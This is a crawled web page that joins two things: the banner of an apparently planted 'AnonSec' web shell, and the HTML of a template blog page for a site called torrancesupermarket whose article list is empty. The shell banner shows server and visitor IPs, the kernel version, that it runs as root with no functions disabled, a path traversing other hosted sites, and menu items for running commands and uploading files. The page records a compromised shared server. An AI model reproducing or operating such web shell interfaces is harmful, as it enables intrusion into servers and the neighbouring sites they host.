|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/shortable.org/../bonafidecache.net/../torrancesupermarket.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Blog - torrancesupermarket</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
html {
scroll-behavior: smooth;
}
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="fixed w-full z-50 top-0 bg-white/95 backdrop-blur-lg shadow-md">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto px-6 py-2">
<a href="./" class="flex items-center space-x-3 group">
<div class="relative">
<div class="absolute inset-0 bg-gradient-to-br from-emerald-400 to-lime-500 rounded-xl blur-sm opacity-50 group-hover:opacity-75 transition-opacity"></div>
<div class="relative w-12 h-12 bg-gradient-to-br from-emerald-500 to-lime-600 rounded-xl flex items-center justify-center">
<span class="text-white font-bold text-xl">t</span>
</div>
</div>
<span class="self-center text-xl font-bold text-gray-900">
torrancesupermarket </span>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-gray-500 rounded-lg md:hidden hover:bg-gray-100">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-semibold flex flex-col md:flex-row md:space-x-6 items-center">
<li><a href="#services" class="block py-2 px-4 text-gray-700 hover:bg-emerald-50 hover:text-emerald-600 rounded-lg transition-all">Services</a></li>
<li><a href="#features" class="block py-2 px-4 text-gray-700 hover:bg-emerald-50 hover:text-emerald-600 rounded-lg transition-all">Features</a></li>
<li><a href="#about" class="block py-2 px-4 text-gray-700 hover:bg-emerald-50 hover:text-emerald-600 rounded-lg transition-all">About</a></li>
<li><a href="#testimonials" class="block py-2 px-4 text-gray-700 hover:bg-emerald-50 hover:text-emerald-600 rounded-lg transition-all">Testimonials</a></li>
<li>
<a href="#contact" class="block py-2.5 px-6 text-white bg-emerald-600 rounded-lg hover:bg-emerald-700 transition-all shadow-md">
Get Started
</a>
</li>
</ul>
</div>
</div>
</nav>
<section class="relative bg-gray-900 py-16 min-h-screen overflow-hidden">
<div class="absolute inset-0 opacity-10">
<div class="absolute top-0 left-0 w-96 h-96 bg-emerald-600 rounded-full filter blur-3xl"></div>
<div class="absolute bottom-0 right-0 w-96 h-96 bg-lime-600 rounded-full filter blur-3xl"></div>
</div>
<div class="max-w-screen-xl mx-auto px-4 relative z-10">
<div class="text-center mb-12">
<span class="inline-block px-4 py-2 mb-4 bg-emerald-600/20 text-emerald-300 rounded-full text-sm font-semibold">Blog</span>
<h1 class="text-4xl md:text-5xl font-black text-white mb-4">All Articles</h1>
<p class="text-xl text-gray-300">Expert insights and industry updates</p>
</div>
<div class="grid md:grid-cols-2 lg:grid-cols-3 gap-6">
</div>
</div>
</section>
<footer class="bg-gradient-to-br from-gray-900 via-gray-800 to-gray-900 text-white py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-12 mb-12">
<div class="md:col-span-2">
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-14 h-14 bg-gradient-to-br from-emerald-500 to-lime-600 rounded-xl flex items-center justify-center shadow-lg">
<span class="text-white font-bold text-xl">t</span>
</div>
<span class="text-3xl font-black">torrancesupermarket</span>
</a>
<p class="text-gray-400 mb-6 max-w-md leading-relaxed">Transforming businesses with innovative solutions and exceptional service.</p>
<div class="flex space-x-4">
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-emerald-600 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm border border-white/20">
<i class="fab fa-facebook-f"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-emerald-600 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm border border-white/20">
<i class="fab fa-twitter"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-emerald-600 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm border border-white/20">
<i class="fab fa-linkedin-in"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-emerald-600 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm border border-white/20">
<i class="fab fa-instagram"></i>
</a>
</div>
</div>
<div>
<h3 class="text-lg font-bold mb-6 text-white">Company</h3>
<ul class="space-y-3 text-gray-400">
<li><a href="./about-us.php" class="hover:text-emerald-400 transition-colors">About</a></li>
<li><a href="blog/" class="hover:text-emeraldBlog</a></li>
<li><a href="#services" class="hover:text-emerald-400 transition-colors">Services</a></li>
<li><a href="#testimonials" class="hover:text-emerald-400 transition-colors">Testimonials</a></li>
<li><a href="./contact.php" class="hover:text-emerald-400 transition-colors">Contact</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-bold mb-6 text-white">Legal</h3>
<ul class="space-y-3 text-gray-400">
<li><a href="./privacy.php" class="hover:text-emerald-400 transition-colors">Privacy</a></li>
<li><a href="./terms.php" class="hover:text-emerald-400 transition-colors">Terms</a></li>
<li><a href="./disclaimer.php" class="hover:text-emerald-400 transition-colors">Disclaimer</a></li>
</ul>
</div>
</div>
<div class="border-t border-gray-800 pt-8">
<div class="flex flex-col md:flex-row justify-between items-center">
<p class="text-gray-400 text-sm">© 2026 torrancesupermarket. All rights reserved.</p>
<div class="flex items-center gap-2 mt-4 md:mt-0">
<span class="text-gray-400 text-sm">Made with</span>
<i class="fas fa-heart text-emerald-500"></i>
</div>
</div>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function() {
const paginationLinks = document.querySelectorAll('a[href*="?page="]');
paginationLinks.forEach(link => {
link.addEventListener('click', function(e) {
window.scrollTo({
top: 0,
behavior: 'smooth'
});
});
});
});
window.addEventListener('load', function() {
if (window.location.search.includes('page=')) {
setTimeout(function() {
window.scrollTo({
top: 0,
behavior: 'smooth'
});
}, 100);
}
});
</script>
</body>
</html>
AnonSec - 2021